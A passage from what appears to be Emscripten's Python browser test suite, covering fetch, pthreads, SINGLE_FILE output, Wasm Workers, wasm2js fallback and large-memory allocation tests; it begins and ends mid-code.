shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_xhr.cpp',
args=['-sFETCH_DEBUG', '-sFETCH', '--proxy-to-worker'])
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@unittest.skip("emscripten_fetch_wait relies on an asm.js-based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_fetch_in_main_thread.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sWASM=0', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
@requires_threads
@disabled('https://github.com/emscripten-core/emscripten/issues/16746')
def test_fetch_idb_store(self):
self.btest_exit('fetch/idb_store.cpp', args=['-sUSE_PTHREADS', '-sFETCH', '-sWASM=0', '-sPROXY_TO_PTHREAD'])
@requires_threads
@disabled('https://github.com/emscripten-core/emscripten/issues/16746')
def test_fetch_idb_delete(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/idb_delete.cpp', args=['-sUSE_PTHREADS', '-sFETCH_DEBUG', '-sFETCH', '-sWASM=0', '-sPROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_locale(self):
self.emcc_args.append('-I' + path_from_root('system/lib/libc/musl/src/internal'))
self.emcc_args.append('-I' + path_from_root('system/lib/pthread'))
for args in [
[],
['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest_exit('pthread/test_pthread_locale.c', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and
# emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest_exit('emscripten_set_canvas_element_size.c')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main
# thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
self.btest_exit('emscripten_get_device_pixel_ratio.c', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
self.btest_exit(test_file('pthread/test_pthread_run_script.cpp'), args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-sOFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', test_file('canvas_animate_resize_shell.html'), '-sGL_DEBUG', '--threadprofiler', '-sASSERTIONS'] + args
print(' '.join(cmd))
self.btest_exit('canvas_animate_resize.cpp', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@parameterized({
'': ([],),
'O3': (['-O3'],)
})
@requires_threads
def test_pthread_hello_thread(self, opts):
for modularize in [[], ['-sMODULARIZE', '-sEXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest_exit(test_file('pthread/hello_thread.c'), args=['-sUSE_PTHREADS'] + modularize + opts)
# Tests that a pthreads build of -sMINIMAL_RUNTIME works well in different build modes
@parameterized({
'': ([],),
'modularize': (['-sMODULARIZE', '-sEXPORT_NAME=MyModule'],),
'O3': (['-O3'],),
'O3_modularize': (['-O3', '-sMODULARIZE', '-sEXPORT_NAME=MyModule'],),
'O3_modularize_MINIMAL_RUNTIME_2': (['-O3', '-sMODULARIZE', '-sEXPORT_NAME=MyModule', '-sMINIMAL_RUNTIME=2'],),
})
def test_minimal_runtime_hello_thread(self, opts):
self.btest_exit(test_file('pthread/hello_thread.c'), args=['--closure=1', '-sMINIMAL_RUNTIME', '-sUSE_PTHREADS'] + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest_exit(test_file('pthread/test_pthread_memory_growth_mainthread.c'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=32MB', '-sMAXIMUM_MEMORY=256MB'] + emcc_args, also_wasm2js=False)
run()
run(['-sPROXY_TO_PTHREAD'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest_exit(test_file('pthread/test_pthread_memory_growth.c'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=32MB', '-sMAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_wasm2js=False)
run()
run(['-sASSERTIONS'])
run(['-sPROXY_TO_PTHREAD'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest_exit(test_file('pthread/test_pthread_reltime.cpp'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.set_setting('EXIT_RUNTIME')
self.compile_btest([test_file('pthread/hello_thread.c'), '-sUSE_PTHREADS', '-o', 'hello_thread_with_blob_url.js'], reporting=Reporting.JS_ONLY)
shutil.copyfile(test_file('pthread/main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?exit:0')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
return 0;
}
''')
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-sEXIT_RUNTIME', '-sMODULARIZE', '-sEXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-sSINGLE_FILE'])
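# Load the generated SINGLE_FILE build from a page where atob and fetch are stubbed out,
# forcing the JS base64 decoder fallback path.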
create_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?exit:0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-sSINGLE_FILE'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-sMINIMAL_RUNTIME', '-sSINGLE_FILE', '-sWASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest_exit('minimal_hello.c', args=['-sSINGLE_FILE', '-sENVIRONMENT=web', '-O2', '--closure=1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
for wasm_enabled in [True, False]:
args = [test_file('browser_test_hello_world.c'), '-o', 'test.js', '-sSINGLE_FILE']
if not wasm_enabled:
args += ['-sWASM=0']
self.compile_btest(args)
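# The locateFile hook below fails the test if it is ever handed a data: URI; with SINGLE_FILE the
# embedded assets are expected to be used directly rather than routed through locateFile.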
create_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-sSINGLE_FILE'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
self.set_setting('EXIT_RUNTIME')
self.compile_btest([test_file('pthread/test_pthread_atomics.cpp'), '-o', 'test.js', '-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'], reporting=Reporting.JS_ONLY)
create_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?exit:0')
def test_access_file_after_heap_resize(self):
create_file('test.txt', 'hello from file')
self.btest_exit(test_file('access_file_after_heap_resize.c'), args=['-sALLOW_MEMORY_GROWTH', '--preload-file', 'test.txt'])
# with separate file packager invocation
self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
self.btest_exit(test_file('access_file_after_heap_resize.c'), args=['-sALLOW_MEMORY_GROWTH', '--pre-js', 'data.js', '-sFORCE_FILESYSTEM'])
def test_unicode_html_shell(self):
create_file('main.cpp', r'''
int main() {
return 0;
}
''')
create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.btest_exit('main.cpp', args=['--shell-file', 'shell.html'])
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest_exit(test_file('pthread/emscripten_thread_sleep.c'), args=['-sUSE_PTHREADS', '-sEXPORTED_RUNTIME_METHODS=[print]'])
  # Tests that Emscripten-compiled applications can be run from a relative path in the browser that is different from the address of the current page
def test_browser_run_from_different_directory(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', Path('subdir/test.js'))
shutil.move('test.wasm', Path('subdir/test.wasm'))
src = read_file('test.html')
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-sMODULARIZE`
def test_browser_run_from_different_directory_async(self):
for args, creations in [
(['-sMODULARIZE'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', Path('subdir/test.js'))
shutil.move('test.wasm', Path('subdir/test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
  # Similar to `test_browser_run_from_different_directory`, but
  # we also eval the initial code, so currentScript is not present. That prevents us
  # from finding the file in a subdir, but here we at least check we do not regress compared to the
  # normal case of finding it in the current dir.
def test_browser_modularize_no_current_script(self):
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-sMODULARIZE'], 'Module();'),
(['subdir'], ['-sMODULARIZE'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js'] + args)
shutil.move('test.js', Path(filesystem_path, 'test.js'))
shutil.move('test.wasm', Path(filesystem_path, 'test.wasm'))
create_file(Path(filesystem_path, 'test.html'), '''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest_exit(test_file('emscripten_request_animation_frame.c'))
def test_emscripten_request_animation_frame_loop(self):
self.btest_exit(test_file('emscripten_request_animation_frame_loop.c'))
def test_request_animation_frame(self):
self.btest_exit('request_animation_frame.cpp', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest_exit(test_file('emscripten_set_timeout.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest_exit(test_file('emscripten_set_timeout_loop.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
def test_emscripten_set_immediate(self):
self.btest_exit(test_file('emscripten_set_immediate.c'))
def test_emscripten_set_immediate_loop(self):
self.btest_exit(test_file('emscripten_set_immediate_loop.c'))
@requires_threads
def test_emscripten_set_interval(self):
self.btest_exit(test_file('emscripten_set_interval.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(test_file('emscripten_performance_now.c'), '0', args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest_exit(test_file('embind/test_pthreads.cpp'), args=['--bind', '-pthread', '-sPTHREAD_POOL_SIZE=2'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind', '-sASYNCIFY'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest_exit(test_file('emscripten_console_log.c'), args=['--pre-js', test_file('emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(test_file('emscripten_throw_number.c'), '0', args=['--pre-js', test_file('emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(test_file('emscripten_throw_string.c'), '0', args=['--pre-js', test_file('emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -sENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest_exit('minimal_hello.c', args=['-sENVIRONMENT=web', '-O3', '--closure=1'])
# Tests that Closure run in combination with -sENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest_exit('webgl_draw_triangle.c', args=['-lGL', '-sENVIRONMENT=web', '-O3', '--closure=1'])
def test_no_declare_asm_module_exports_asmjs(self):
# TODO(sbc): Fix closure warnings with MODULARIZE + WASM=0
self.ldflags.remove('-sCLOSURE_WARNINGS=error')
for minimal_runtime in [[], ['-sMINIMAL_RUNTIME']]:
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-sDECLARE_ASM_MODULE_EXPORTS=0', '-sENVIRONMENT=web', '-O3', '--closure=1', '-sWASM=0'] + minimal_runtime)
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
for mode in [1, 2]:
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-sDECLARE_ASM_MODULE_EXPORTS=0', '-sENVIRONMENT=web', '-O3', '--closure=1', f'-sMINIMAL_RUNTIME={mode}'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-sMINIMAL_RUNTIME=2']
for wasm in [[], ['-sWASM=0', '--memory-init-file', '0'], ['-sWASM=0', '--memory-init-file', '1'], ['-sSINGLE_FILE'], ['-sWASM=0', '-sSINGLE_FILE']]:
for modularize in [[], ['-sMODULARIZE']]:
print(str(args + wasm + modularize))
self.btest_exit('minimal_hello.c', args=args + wasm + modularize)
# Tests that -sMINIMAL_RUNTIME works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [
[],
['-sMINIMAL_RUNTIME_STREAMING_WASM_COMPILATION', '--closure=1'],
['-sMINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION', '--closure=1']
]:
self.btest_exit(test_file('small_hello_world.c'), args=args + ['-sMINIMAL_RUNTIME'])
@requires_threads
def test_offset_converter(self, *args):
self.btest_exit(test_file('browser/test_offset_converter.c'), assert_returncode=1, args=['-sUSE_OFFSET_CONVERTER', '-gsource-map', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS'])
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest_exit(test_file('test_emscripten_unwind_to_js_event_loop.c'))
def test_wasm2js_fallback(self):
self.set_setting('EXIT_RUNTIME')
for args in [[], ['-sMINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-sWASM=2', '-o', 'test.html'] + args)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
      # Then disable WebAssembly support in the VM and try again. It should still work with the Wasm2JS fallback.
html = read_file('test.html')
html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
create_file('test.html', html)
      os.remove('test.wasm') # Also delete the Wasm file to check that no attempt is made to load it.
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
self.set_setting('EXIT_RUNTIME')
for args in [[], ['-sMINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-sWASM=2', '-o', 'test.html'] + args)
# Run without the .wasm.js file present: with Wasm support, the page should still run
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
      # Restore the .wasm.js file, then corrupt the .wasm file, which should trigger the Wasm2js fallback to run
os.rename('test.wasm.js.unused', 'test.wasm.js')
shutil.copyfile('test.js', 'test.wasm')
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
def test_system(self):
self.btest_exit(test_file('system.c'))
# Tests the hello_wasm_worker.c documentation example code.
@also_with_minimal_runtime
def test_wasm_worker_hello(self):
self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS'])
def test_wasm_worker_hello_minimal_runtime_2(self):
self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS', '-sMINIMAL_RUNTIME=2'])
# Tests Wasm Workers build in Wasm2JS mode.
@also_with_minimal_runtime
def test_wasm_worker_hello_wasm2js(self):
self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS', '-sWASM=0'])
  # Tests the WASM_WORKERS=2 build mode, which embeds the Wasm Worker bootstrap JS script into the main JS file.
@also_with_minimal_runtime
def test_wasm_worker_embedded(self):
self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS=2'])
# Tests Wasm Worker thread stack setup
@also_with_minimal_runtime
def test_wasm_worker_thread_stack(self):
for mode in [0, 1, 2]:
self.btest(test_file('wasm_worker/thread_stack.c'), expected='0', args=['-sWASM_WORKERS', f'-sSTACK_OVERFLOW_CHECK={mode}'])
# Tests emscripten_malloc_wasm_worker() and emscripten_current_thread_is_wasm_worker() functions
@also_with_minimal_runtime
def test_wasm_worker_malloc(self):
self.btest(test_file('wasm_worker/malloc_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests Wasm Worker+pthreads simultaneously
@also_with_minimal_runtime
def test_wasm_worker_and_pthreads(self):
self.btest(test_file('wasm_worker/wasm_worker_and_pthread.c'), expected='0', args=['-sWASM_WORKERS', '-pthread'])
# Tests emscripten_wasm_worker_self_id() function
@also_with_minimal_runtime
def test_wasm_worker_self_id(self):
self.btest(test_file('wasm_worker/wasm_worker_self_id.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests direct Wasm Assembly .S file based TLS variables in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_tls_wasm_assembly(self):
self.btest(test_file('wasm_worker/wasm_worker_tls_wasm_assembly.c'),
expected='42', args=['-sWASM_WORKERS', test_file('wasm_worker/wasm_worker_tls_wasm_assembly.S')])
# Tests C++11 keyword thread_local for TLS in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_cpp11_thread_local(self):
self.btest(test_file('wasm_worker/cpp11_thread_local.cpp'), expected='42', args=['-sWASM_WORKERS'])
# Tests C11 keyword _Thread_local for TLS in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_c11__Thread_local(self):
    self.btest(test_file('wasm_worker/c11__Thread_local.c'), expected='42', args=['-sWASM_WORKERS', '-std=gnu11']) # Cannot use plain -std=c11 here: EM_ASM needs GNU extensions, so build with -std=gnu11.
# Tests GCC specific extension keyword __thread for TLS in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_gcc___thread(self):
self.btest(test_file('wasm_worker/gcc___Thread.c'), expected='42', args=['-sWASM_WORKERS', '-std=gnu11'])
# Tests emscripten_wasm_worker_sleep()
@also_with_minimal_runtime
def test_wasm_worker_sleep(self):
self.btest(test_file('wasm_worker/wasm_worker_sleep.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests emscripten_terminate_wasm_worker()
@also_with_minimal_runtime
def test_wasm_worker_terminate(self):
self.btest(test_file('wasm_worker/terminate_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_terminate_all_wasm_workers()
@also_with_minimal_runtime
def test_wasm_worker_terminate_all(self):
self.btest(test_file('wasm_worker/terminate_all_wasm_workers.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_wasm_worker_post_function_*() API
@also_with_minimal_runtime
def test_wasm_worker_post_function(self):
self.btest(test_file('wasm_worker/post_function.c'), expected='8', args=['-sWASM_WORKERS'])
# Tests emscripten_wasm_worker_post_function_*() API and EMSCRIPTEN_WASM_WORKER_ID_PARENT
# to send a message back from Worker to its parent thread.
@also_with_minimal_runtime
def test_wasm_worker_post_function_to_main_thread(self):
self.btest(test_file('wasm_worker/post_function_to_main_thread.c'), expected='10', args=['-sWASM_WORKERS'])
# Tests emscripten_navigator_hardware_concurrency() and emscripten_atomics_is_lock_free()
@also_with_minimal_runtime
def test_wasm_worker_hardware_concurrency_is_lock_free(self):
self.btest(test_file('wasm_worker/hardware_concurrency_is_lock_free.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_wasm_wait_i32() and emscripten_wasm_notify() functions.
@also_with_minimal_runtime
def test_wasm_worker_wait32_notify(self):
self.btest(test_file('wasm_worker/wait32_notify.c'), expected='2', args=['-sWASM_WORKERS'])
# Tests emscripten_wasm_wait_i64() and emscripten_wasm_notify() functions.
@also_with_minimal_runtime
def test_wasm_worker_wait64_notify(self):
self.btest(test_file('wasm_worker/wait64_notify.c'), expected='2', args=['-sWASM_WORKERS'])
# Tests emscripten_atomic_wait_async() function.
@also_with_minimal_runtime
def test_wasm_worker_wait_async(self):
self.btest(test_file('wasm_worker/wait_async.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_atomic_cancel_wait_async() function.
@also_with_minimal_runtime
def test_wasm_worker_cancel_wait_async(self):
self.btest(test_file('wasm_worker/cancel_wait_async.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests emscripten_atomic_cancel_all_wait_asyncs() function.
@also_with_minimal_runtime
def test_wasm_worker_cancel_all_wait_asyncs(self):
self.btest(test_file('wasm_worker/cancel_all_wait_asyncs.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests emscripten_atomic_cancel_all_wait_asyncs_at_address() function.
@also_with_minimal_runtime
def test_wasm_worker_cancel_all_wait_asyncs_at_address(self):
self.btest(test_file('wasm_worker/cancel_all_wait_asyncs_at_address.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_init(), emscripten_lock_waitinf_acquire() and emscripten_lock_release()
@also_with_minimal_runtime
def test_wasm_worker_lock_waitinf(self):
self.btest(test_file('wasm_worker/lock_waitinf_acquire.c'), expected='4000', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_wait_acquire() and emscripten_lock_try_acquire() in Worker.
@also_with_minimal_runtime
def test_wasm_worker_lock_wait(self):
self.btest(test_file('wasm_worker/lock_wait_acquire.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_wait_acquire() between two Wasm Workers.
@also_with_minimal_runtime
def test_wasm_worker_lock_wait2(self):
self.btest(test_file('wasm_worker/lock_wait_acquire2.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_async_acquire() function.
@also_with_minimal_runtime
def test_wasm_worker_lock_async_acquire(self):
self.btest(test_file('wasm_worker/lock_async_acquire.c'), expected='0', args=['--closure=1', '-sWASM_WORKERS'])
# Tests emscripten_lock_busyspin_wait_acquire() in Worker and main thread.
@also_with_minimal_runtime
def test_wasm_worker_lock_busyspin_wait(self):
self.btest(test_file('wasm_worker/lock_busyspin_wait_acquire.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_busyspin_waitinf_acquire() in Worker and main thread.
@also_with_minimal_runtime
def test_wasm_worker_lock_busyspin_waitinf(self):
self.btest(test_file('wasm_worker/lock_busyspin_waitinf_acquire.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests that proxied JS functions cannot be called from Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_no_proxied_js_functions(self):
self.btest(test_file('wasm_worker/no_proxied_js_functions.c'), expected='0',
args=['--js-library', test_file('wasm_worker/no_proxied_js_functions.js'), '-sWASM_WORKERS', '-sASSERTIONS'])
# Tests emscripten_semaphore_init(), emscripten_semaphore_waitinf_acquire() and emscripten_semaphore_release()
@also_with_minimal_runtime
def test_wasm_worker_semaphore_waitinf_acquire(self):
self.btest(test_file('wasm_worker/semaphore_waitinf_acquire.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_semaphore_try_acquire() on the main thread
@also_with_minimal_runtime
def test_wasm_worker_semaphore_try_acquire(self):
self.btest(test_file('wasm_worker/semaphore_try_acquire.c'), expected='0', args=['-sWASM_WORKERS'])
@no_firefox('no 4GB support yet')
@requires_v8
def test_zzz_zzz_4gb(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('browser', 'test_4GB.cpp')
# Tests that emmalloc supports up to 4GB Wasm heaps.
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_4gb(self):
self.btest(test_file('mem_growth.cpp'),
expected='-65536', # == 4*1024*1024*1024 - 65536 casted to signed
args=['-sMALLOC=emmalloc', '-sABORTING_MALLOC=0', '-sALLOW_MEMORY_GROWTH=1', '-sMAXIMUM_MEMORY=4GB'])
# Test that it is possible to malloc() a huge 3GB memory block in 4GB mode using emmalloc.
# Also test emmalloc-memvalidate and emmalloc-memvalidate-verbose build configurations.
@no_firefox('no 4GB support yet')
def test_emmalloc_3GB(self):
def test(args):
self.btest_exit(test_file('alloc_3gb.cpp'),
args=['-sMAXIMUM_MEMORY=4GB', '-sALLOW_MEMORY_GROWTH=1'] + args)
test(['-sMALLOC=emmalloc'])
test(['-sMALLOC=emmalloc-debug'])
test(['-sMALLOC=emmalloc-memvalidate'])
test(['-sMALLOC=emmalloc-memvalidate-verbose'])
@parameterized({
# the fetch backend works even on the main thread: we proxy to a background
# thread and busy-wait
'main_thread': (['-sPTHREAD_POOL_SIZE=4'],),
# using proxy_to_pthread also works, of course
'proxy_to_pthread': (['-sPROXY_TO_PTHREAD', '-sINITIAL_MEMORY=32MB', '-DPROXYING'],),
})
@requires_threads
def test_wasmfs_fetch_backend(self, args):
if is_firefox() and '-sPROXY_TO_PTHREAD' not in args:
return self.skipTest('ff hangs on the main_thread version. browser bug?')
create_file('data.dat', 'hello, fetch')
create_file('test.txt', 'fetch 2')
try_delete('subdir')
ensure_dir('subdir')
create_file('subdir/backendfile', 'file 1')
create_file('subdir/backendfile2', 'file 2')
self.btest_exit(test_file('wasmfs/wasmfs_fetch.c'),
